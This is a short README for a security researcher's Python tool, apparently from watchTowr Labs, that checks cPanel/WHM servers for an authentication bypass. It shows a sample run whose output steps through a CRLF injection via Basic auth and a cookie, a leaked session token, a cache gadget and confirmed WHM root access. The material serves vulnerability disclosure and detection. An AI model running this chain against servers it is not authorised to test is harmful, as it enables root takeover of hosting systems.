cve-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator

cPanel/WHM Authentication Bypass Detection Artifact Generator Tool

Description

This Detection Artifact Generator verifies if cPanel/WHM is vulnerable to a recent authentication bypass.

Detection in Action

Test against a vulnerable instance:

python authbypass-RCE.py --target https://target:2087/ 
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

        (*) cPanel/WHM Authentication Bypass - Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-Pending]

[0] hostname = 
[1] minting a preauth session...
    session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.89"}

Affected Versions

Refer to cPanel website here

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team

• https://labs.watchtowr.com/

• https://x.com/watchtowrcyber